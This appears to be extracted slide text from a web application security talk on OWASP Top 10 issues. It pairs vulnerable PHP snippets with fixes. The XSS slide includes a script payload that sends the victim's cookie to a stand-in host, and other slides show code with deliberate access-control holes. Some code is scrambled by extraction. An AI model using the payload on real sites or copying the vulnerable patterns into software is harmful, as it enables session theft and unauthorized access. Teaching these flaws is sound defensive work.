2. A3 – Cross-Site Scripting (XSS)
2
● Whenever untrusted data is sent to the
browser without proper validation and
escaping!
● XSS allows the attacker to OWN the
victims browser and do ... everything!
● Stored, Reflected and DOM based
XSS
3. A3 – steal user cookie
3
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?=render_results($results); ?>
</body>
</html>
// set search to: "<script>document.location='http://www.example.com/precious_cookie
?cookie='+document.cookie</script>"
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?>
<?=render_results($results); ?>
</body>
</html>
4. A4 – Insecure Direct Object Reference
4
● Whenever developer exposes
references to internal objects and don't
have proper access control.
● Attackers can change the references
and access resources that shouldn't be
accessible.
5. A4 – Access other user account
5
<?php
// prune to insecure direct reference
// script.php?account=10
$accountId =
intval($_REQUEST['account']);
$account = new Account($accountId); echo
render_account_info($account);
// and if I change account to "9" ?
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId =
intval($_REQUEST['account']);
$account = new Account($accountId); if (
$account->canRead($user)) {
echo render_account_info($account);
} else {
echo "Access denied";
}
6. A5 – Security Misconfiguration
6
● Often fails in securing the full stack
leads to application / servers being
compromised.
● Take into consideration other services /
applications running in the same
infrastructure
● Watch out for outdated software
● Watch out for default accounts
7. A7 – Missing Function Level Access Control
7
● Most applications validate function
based access control before displaying
options in UI, but fail to validate when
the function is accessed.
● Attacker can forge request to functions
that shouldn't be available
8. A7 – insecure function
8
<?php
// prune to insecure function
access
// script.php?user=john&action=read
$userId
$action
$user
=
= $_REQUEST['user'];
=
$_REQUEST['action'];
newUser($userId);
switch($action) { case 'read':
echo render_user($user); break;
case 'delete':
$user->delete(); echo "user
Deleted"; break;
}
// and if I change action to
"delete"?
<?php
$userId =
$_REQUEST['user'];
$action =
$_REQUEST['action'];
$loggedUser = new
AppUser($_SESSION['userInfo']);$user = new User($userId); switch($action) {
case 'read':
if ( $user->canRead($loggedUser) ){
echo render_user($user);
}
break; case 'delete':
if ( $user->canDelete($loggedUser) ){
$user->delete(); echo "user Deleted";
}
break;
}
9. A9 – Using Components with know Vulnerabilities
9
● Whenever you use libraries,
frameworks, or other software modules
with known vulnerabilities.
● Attackers can leverage this issues to
attack your application / server / etc.